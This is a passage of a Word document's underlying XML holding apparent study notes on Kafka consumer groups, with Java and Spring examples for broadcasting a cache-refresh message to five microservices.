    <w:p w14:paraId="314020D4"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ingle Partition, Single Consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0438406F"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a topic has </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one partition</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, then </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one consumer from the consumer group can read messages from that partition</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at any given time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C8683"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there are </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple consumers within the same consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, only </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one of them</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will get the message, ensuring no duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64914586"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eparate Consumer Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34252249"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If you have </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>another consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not the same as the first one), it will </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read the message independently</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA126FC" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="009C08FC" w:rsidRDefault="009C08FC" w:rsidP="009C08FC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka allows </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple consumer groups to read the same message independently</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because they maintain </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34614A91" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="009C08FC" w:rsidRDefault="00000000" w:rsidP="009C08FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1BF0D5BE">
          <v:rect id="_x0000_i3573" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13767F49" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="009C08FC" w:rsidRDefault="009C08FC" w:rsidP="009C08FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scenario Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FDC87E"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Same Consumer Group:</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Only one consumer will read the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0173B8"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Different Consumer Group:</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each consumer group will receive the message separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C153E7" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="009C08FC" w:rsidRDefault="009C08FC" w:rsidP="009C08FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the same group and </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>independent consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across different groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666D3303" w14:textId="7E2689AF" w:rsidR="004E09A2" w:rsidRDefault="00000000" w:rsidP="004E09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F50751">
          <v:rect id="_x0000_i3574" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="744FB709" w14:textId="1CCC3914" w:rsidR="00522F3E" w:rsidRPr="00D87893" w:rsidRDefault="00522F3E" w:rsidP="00522F3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="883" w:name="_Toc197868097"/>
      <w:r w:rsidRPr="00522F3E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>I have one use case, let's say we have 1 notification microservice and we have 5 different microservices and there are internally having caching system so whenever this notification service will restart during that it will send a message to particular topic saying that all the 5 microservices please refresh your cache, so how all 5 microservices can listen to the message and is it a valid use case</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87893">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="883"/>
    </w:p>
    <w:p w14:paraId="2E5E2C1F" w14:textId="407BB937" w:rsidR="000F6ED5" w:rsidRPr="000F6ED5" w:rsidRDefault="000F6ED5" w:rsidP="001A2092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes, it is a valid use case, and it can be efficiently implemented using </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Publish-Subscribe</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF75A1"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7F87DA53">
          <v:rect id="_x0000_i3575" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE08F8F"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F0345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When the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Notification microservice</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> restarts, it sends a message to a Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instructing all </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>refresh their cache</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5114F42D"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19CF940C">
          <v:rect id="_x0000_i3576" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE844E1"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How to Implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7401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Kafka Topic Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135339E2"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Create a Kafka topic (e.g., cache-refresh-topic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE0400E"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Set the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number of partitions to 1</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as it's a broadcast message).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080658B1"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Notification Microservice (Producer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76853EA9"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On startup or restart, the notification service publishes a </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"cache refresh"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> message to the cache-refresh-topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C1DAB8"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Producer Code (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0B27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ublic void sendCacheRefreshMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB4F2E"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tring topic = "cache-refresh-topic";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F196A4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tring message = "REFRESH_CACHE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F2C7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kafkaTemplate.send(topic, message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A28AE3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ystem.out.println("Cache refresh message sent to topic.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AF37A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5DF82304"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4B6F476E">
          <v:rect id="_x0000_i3577" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="136446C5"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5 Microservices (Consumers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB9FC7"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Each microservice acts as a </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listening to the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same topic</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382D4F37"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All consumers receive the message </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>independently</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, as they belong to </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D44B41E"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Consumer Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBEB32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spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB80E3"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kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BC5443"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consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF9795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group-id: ${spring.application.name}  # Unique group ID per service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0C0C5"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auto-offset-reset: earliest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E00808"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Consumer Code (Java):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA0D2C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KafkaListener(topics = "cache-refresh-topic")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC3EFA6"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ublic void handleCacheRefresh(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD595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if ("REFRESH_CACHE".equals(message)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA4F7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        refreshCache();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F7DD7A"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System.out.println("Cache refreshed for service: " + serviceName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F8695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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEED8A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78FB07B0" w14:textId="77777777" w:rsidR="000F6ED5" w:rsidRPr="000F6ED5" w:rsidRDefault="000F6ED5" w:rsidP="000F6ED5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5162D689"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private void refreshCache() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD195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    // Logic to clear and reload the cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72510034"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2881CB8B"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07143436">
          <v:rect id="_x0000_i3578" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A68B1"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Why This Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F15F0"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Publish-Subscribe Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E393E2E"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Each microservice is in its </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>own consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451321B5"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Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivers the message to each group independently</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A010309"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All 5 microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will receive the message when the notification service restarts.</w:t>
      </w:r>
    </w:p>
